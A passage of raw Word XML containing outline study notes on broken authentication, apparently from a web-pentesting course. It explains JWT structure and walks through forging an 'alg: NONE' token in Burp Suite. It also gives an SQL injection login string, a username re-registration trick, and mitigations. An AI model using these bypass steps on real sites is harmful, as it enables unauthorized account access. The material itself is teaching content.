        <w:r w:rsidR="006712A9" w:rsidRPr="004A2002">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.kirsle.net/wizards/flask-session.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ABBDB05" w14:textId="02571E1D" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JSON Web Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF54162" w14:textId="141F2D0D" w:rsidR="001352F0" w:rsidRPr="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001352F0">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://jwt.io/#debugger-io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85CD73" w14:textId="785F3B56" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>generated via HMAC hashing and/or public/private keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78744388" w14:textId="41FC4AE6" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lets website know what kind of access the currently logged-in user has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2307A" w14:textId="78559A8A" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Divided into three parts, separated by periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234196C2" w14:textId="3C04B1B0" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Header – consists of alg used and type of token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B217F36" w14:textId="65BDBD1F" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>{ “alg”: “HS256”, “typ”: “JWT”}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D49F8" w14:textId="4636A965" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0D6042" w14:textId="41240BDF" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contains access given to the certain user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE84ECB" w14:textId="7DEBEA1A" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>varies from site to site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80D656" w14:textId="493B7E87" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71D784" w14:textId="23E3A251" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to make sure integrity of data was maintained while transferring it from user computer to server and back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6CCC6" w14:textId="4E30FE0F" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>encrypted with alg passed in header value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F6A74" w14:textId="613E3B95" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decrypted with predefined secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80B865" w14:textId="05CEABA5" w:rsidR="001352F0" w:rsidRDefault="001352F0" w:rsidP="001352F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="001352F0">
        <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B7DF4" w14:textId="5EC401FF" w:rsidR="008B5005" w:rsidRDefault="008B5005" w:rsidP="008B5005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D75A5" w14:textId="52F05055" w:rsidR="008B5005" w:rsidRDefault="00834997" w:rsidP="008B5005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sometimes during development of a web application, JSON tokens will have encryption alg set to NONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6846BE2B" w14:textId="6E2FF2E2" w:rsidR="00834997" w:rsidRDefault="00834997" w:rsidP="008B5005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>low privilege user can login, get JWT token, decode, and edit headers to set alg value to None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB203C" w14:textId="77777777" w:rsidR="00B53975" w:rsidRDefault="00B53975" w:rsidP="008B5005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4085C3A9" w14:textId="1A586298" w:rsidR="00B53975" w:rsidRDefault="00B53975" w:rsidP="00B53975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET request to /protected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498ACCA" w14:textId="4AA06E6B" w:rsidR="00B53975" w:rsidRDefault="00B53975" w:rsidP="00B53975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authorization: JWT and then cookie below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B8E9CC" w14:textId="0D79F90F" w:rsidR="00B53975" w:rsidRDefault="00B53975" w:rsidP="00B53975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy and decode on jwt.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54696D" w14:textId="6CA8594F" w:rsidR="00B53975" w:rsidRDefault="00B53975" w:rsidP="00B53975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11770C6F" w14:textId="412F7612" w:rsidR="00B53975" w:rsidRDefault="00441113" w:rsidP="00B53975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>with base64 encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D17085" w14:textId="3D092AC9" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>encode first part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB3B16" w14:textId="1E40666B" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00441113">
        <w:t>{"typ":"JWT","alg":"NONE"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5CB66" w14:textId="047E557E" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>encode second part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA26A8F" w14:textId="4A142F2A" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00441113">
        <w:t>{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03624942" w14:textId="79E5031C" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>None value negates need for third part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B54879" w14:textId="55D1A527" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00441113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>combine parts with period between parts 1 and 2 and at the end of part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E72A4A" w14:textId="678648DF" w:rsidR="00441113" w:rsidRDefault="00441113" w:rsidP="00F53F66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>take new cookie and place in</w:t>
      </w:r>
      <w:r w:rsidR="00F53F66">
        <w:t xml:space="preserve"> Burpsuite cookie position previously intercepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0647C" w14:textId="04CD4D9F" w:rsidR="006712A9" w:rsidRDefault="006712A9" w:rsidP="006712A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login with ‘ OR 1=1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577FC0AE" w14:textId="70EDB15C" w:rsidR="006712A9" w:rsidRPr="00F512ED" w:rsidRDefault="006712A9" w:rsidP="006712A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>examine what information is present within decoded cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AED12" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common flaws in authentication mechanisms include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D579FF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Brute force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6024A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use of weak credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682C087" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Weak session cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120C73F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Predictable values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71888B4F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mitigation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E554439" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Strong password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826EF2F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Automatic lockout after certain number of attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B2CBEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45DB27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Broken Authentication Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F52668" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Logic flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF494E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Developers forget to sanitize the input (username &amp; password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C3A55" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vulnerable to SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796B89A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Re-registration of an existing user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34D12D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“admin” versus “ admin”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31496E09" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Register and then login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F1C12" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
